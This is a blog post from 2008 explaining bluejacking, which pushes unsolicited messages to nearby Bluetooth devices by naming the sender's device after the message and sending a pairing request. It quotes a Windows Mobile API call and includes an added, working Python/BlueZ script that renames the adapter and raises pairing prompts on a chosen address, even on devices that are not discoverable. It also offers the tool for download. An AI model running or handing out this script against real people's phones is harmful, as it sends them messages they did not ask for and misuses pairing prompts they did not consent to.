By Radu Motisan, posted on September 16th, 2008
What is BlueJacking?
Bluejacking refers to the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs or laptop computers.
This attack is usually harmless; its main effect is to surprise the victim. Messages can only be sent within a relatively small radius because of the low power of Bluetooth radio transmitters: the range is usually around 10 meters for mobile phones, while laptops with more powerful Class 1 transmitters can reach up to 100 meters.
While the usual Bluejacking attack sends vCards over the OBEX protocol, this post presents a simpler approach.
Usually the first step is to scan for nearby Bluetooth-enabled devices. A device can be detected only if it is running in a special mode called Discoverable. In this mode the device answers inquiries by advertising its presence and its Bluetooth address, so that remote devices can open connections to it.
Part of the Bluetooth security model is the authentication mechanism known as Pairing. Devices generally require pairing, or prompt the owner, before they allow a remote device to use any (or most) of their services. Some devices, such as mobile phones, usually accept OBEX business cards and notes without any pairing or prompt.
This is why regular Bluejacking attacks use the OBEX business card (vCard) push.
But we can deliver readable messages even more easily. Once we have the Bluetooth address of the "victim", we can simply request pairing with the remote device; the user is then prompted to allow or deny the process, and that prompt shows the name of the device that initiated the pairing sequence, in this case the name of our device.
So all we need to do is set our message as our Bluetooth device name and initiate a pairing request to the remote device, the "victim".
The result is shown below:
This snapshot was taken from a Windows Mobile 5.0 smartphone, that received this message during the pairing process.
The BlueJacking was initiated from a different pocket PC device, running a simple tool:
This tool can search for remote devices that are in discoverable mode. Note, however, that the target does not need to be discoverable to be subject to this attack; it only needs to have its Bluetooth module switched on. Discoverability only determines whether the tool can find the address on its own: if the attacker already knows the address, the pairing request can be sent to a non-discoverable device just as well.
Then the tool lets the user define a custom message, which gets set as the Bluetooth device name. On Windows Mobile this is achieved by setting the registry key:
Then a pairing request is sent to the remote device using this simple Bluetooth API call (BthPairRequest from the Windows CE bthutil library; the second argument is the PIN length and the third the PIN):
BthPairRequest(&m_btaClient,4,(unsigned char *)"0000");
m_btaClient is the "victim"'s Bluetooth address (a BT_ADDR), and "0000" is the PIN we offer for the pairing. The message is carried by the pairing prompt itself, so it is displayed whether or not the victim accepts the pairing.
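The same procedure (scan, set the message as the local device name, request pairing against a known address) carried over to Linux/BlueZ, as an added example that is not part of the original post and not the author's tool. It assumes the BlueZ command-line tools hciconfig and hcitool are installed, that the adapter is hci0, and that `hcitool cc` followed by `hcitool auth` triggers the pairing prompt on the target; on Linux the local name is set through hciconfig rather than the registry. The sample scan output is constructed, not captured. The script only builds and prints the commands unless dry_run is turned off.

```python
"""
Bluejacking through the pairing prompt, Linux/BlueZ version (added example,
not the original Windows Mobile tool).

The target displays the initiator's device name in its pairing prompt, so we
rename the local adapter to the message and then request authentication
against the target's address. The target does not have to be discoverable;
the address is all that is needed.

Assumptions (not from the original post): adapter hci0, BlueZ hciconfig and
hcitool present, and `hcitool cc` + `hcitool auth` raising the pairing prompt.
"""
import re
import shlex
import subprocess
from typing import List, Tuple

BDADDR_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
MAX_NAME_BYTES = 248  # Bluetooth Core spec limit for the local device name (UTF-8 bytes)

# Constructed sample of `hcitool scan` output (not a real capture).
SAMPLE_SCAN_OUTPUT = """Scanning ...
\t00:11:22:33:44:55\tNokia 6300
\t66:77:88:99:AA:BB\tWM5 Smartphone
\tnot an address line
"""


def is_valid_bdaddr(addr: str) -> bool:
    """True for a colon-separated 48-bit Bluetooth address."""
    return bool(BDADDR_RE.match(addr))


def parse_scan_output(text: str) -> List[Tuple[str, str]]:
    """Return (address, name) pairs for every device line of hcitool scan output."""
    devices = []
    for line in text.splitlines():
        parts = line.strip().split("\t", 1)
        if len(parts) == 2 and is_valid_bdaddr(parts[0]):
            devices.append((parts[0].upper(), parts[1].strip()))
    return devices


def fit_device_name(message: str, limit: int = MAX_NAME_BYTES) -> str:
    """Truncate the message to `limit` UTF-8 bytes without splitting a character."""
    data = message.encode("utf-8")
    if len(data) <= limit:
        return message
    return data[:limit].decode("utf-8", errors="ignore")


def build_bluejack_commands(target: str, message: str, adapter: str = "hci0") -> List[List[str]]:
    """Command sequence: rename the adapter, connect to the victim, request authentication."""
    if not is_valid_bdaddr(target):
        raise ValueError(f"not a Bluetooth address: {target!r}")
    name = fit_device_name(message)
    return [
        ["hciconfig", adapter, "name", name],        # our message becomes the local device name
        ["hcitool", "-i", adapter, "cc", target],    # ACL connection to the victim, by address only
        ["hcitool", "-i", adapter, "auth", target],  # authentication request -> pairing prompt shows our name
    ]


def run_bluejack(target: str, message: str, adapter: str = "hci0", dry_run: bool = True) -> List[str]:
    """Build (and, unless dry_run, execute as root) the commands; return them rendered as shell lines."""
    cmds = build_bluejack_commands(target, message, adapter)
    if not dry_run:
        for cmd in cmds:
            subprocess.run(cmd, check=True)
    return [shlex.join(cmd) for cmd in cmds]


if __name__ == "__main__":
    for addr, name in parse_scan_output(SAMPLE_SCAN_OUTPUT):
        print(f"found {addr}  {name}")
    for line in run_bluejack("66:77:88:99:AA:BB", "Hello from the next table :)"):
        print(line)
```

Renaming the adapter needs root, and the 248-byte cap is the protocol limit; real phones show far less of the name in the prompt, so keep the message short.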
The tool is attached; download and use it at your own risk, as I am not to be held responsible for any damage resulting from its use. This article was only created to help people better understand some of the "permitted" features of the current Bluetooth implementation.
Download the tool: bluejack